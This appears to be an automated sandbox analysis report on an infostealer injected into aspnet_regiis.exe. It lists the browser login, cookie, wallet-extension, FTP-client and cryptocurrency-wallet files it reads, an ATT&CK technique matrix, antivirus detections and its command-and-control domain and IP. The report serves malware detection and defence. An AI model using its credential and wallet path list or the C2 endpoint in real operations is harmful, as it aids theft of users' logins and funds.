            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
            Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 7700, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 7700, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
            Windows Management Instrumentation
            1
            DLL Side-Loading
            311
            Process Injection
            1
            Masquerading
            2
            OS Credential Dumping
            1
            System Time Discovery
            Remote Services1
            Archive Collected Data
            21
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts2
            Command and Scripting Interpreter
            Boot or Logon Initialization Scripts1
            DLL Side-Loading
            13
            Virtualization/Sandbox Evasion
            LSASS Memory151
            Security Software Discovery
            Remote Desktop Protocol31
            Data from Local System
            2
            Non-Application Layer Protocol
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
            Disable or Modify Tools
            Security Account Manager13
            Virtualization/Sandbox Evasion
            SMB/Windows Admin Shares2
            Clipboard Data
            113
            Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook311
            Process Injection
            NTDS1
            Process Discovery
            Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
            Obfuscated Files or Information
            LSA Secrets1
            File and Directory Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
            Software Packing
            Cached Domain Credentials33
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            DLL Side-Loading
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            S#U043eftWare.exe26%ReversingLabsWin32.Infostealer.Generic
            S#U043eftWare.exe100%Joe Sandbox ML
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\gdi32.dll100%AviraHEUR/AGEN.1301971
            C:\Users\user\AppData\Roaming\gdi32.dll100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://property-imper.sbs/BW#?060%Avira URL Cloudsafe
            https://property-imper.sbs/U0%Avira URL Cloudsafe
            https://property-imper.sbs/api;0%Avira URL Cloudsafe
            https://property-imper.sbs/l0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            property-imper.sbs
            104.21.33.116
            truefalse
              high
              NameMaliciousAntivirus DetectionReputation
              https://property-imper.sbs:443/apifalse
                high
                https://property-imper.sbs/apifalse
                  high
                  NameSourceMaliciousAntivirus DetectionReputation
                  https://duckduckgo.com/chrome_newtabaspnet_regiis.exe, 00000002.00000003.1731296070.0000000004C08000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1731170940.0000000004C1F000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://duckduckgo.com/ac/?q=aspnet_regiis.exe, 00000002.00000003.1731296070.0000000004C08000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1731170940.0000000004C1F000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgaspnet_regiis.exe, 00000002.00000003.1775310035.0000000004BFB000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://www.google.com/images/branding/product/ico/googleg_lodp.icoaspnet_regiis.exe, 00000002.00000003.1731296070.0000000004C08000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1731170940.0000000004C1F000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.aspnet_regiis.exe, 00000002.00000003.1775310035.0000000004BFB000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=aspnet_regiis.exe, 00000002.00000003.1731296070.0000000004C08000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1731170940.0000000004C1F000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://crl.rootca1.amazontrust.com/rootca1.crl0aspnet_regiis.exe, 00000002.00000003.1774118765.0000000004C2F000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://upx.sf.netAmcache.hve.5.drfalse
                                  high
                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=aspnet_regiis.exe, 00000002.00000003.1731296070.0000000004C08000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1731170940.0000000004C1F000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://ocsp.rootca1.amazontrust.com0:aspnet_regiis.exe, 00000002.00000003.1774118765.0000000004C2F000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016aspnet_regiis.exe, 00000002.00000003.1731740518.0000000004C4C000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1731819034.0000000004C45000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1752555209.0000000004C45000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1731925618.0000000004C45000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1752661147.0000000004C45000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17aspnet_regiis.exe, 00000002.00000003.1731740518.0000000004C4C000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1731819034.0000000004C45000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1752555209.0000000004C45000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1731925618.0000000004C45000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1752661147.0000000004C45000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://www.ecosia.org/newtab/aspnet_regiis.exe, 00000002.00000003.1731296070.0000000004C08000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1731170940.0000000004C1F000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://property-imper.sbs/aspnet_regiis.exe, 00000002.00000002.1880269736.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1880269736.00000000006E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-braspnet_regiis.exe, 00000002.00000003.1775057294.0000000004D10000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://property-imper.sbs/laspnet_regiis.exe, 00000002.00000003.1878990637.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1880269736.00000000006D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
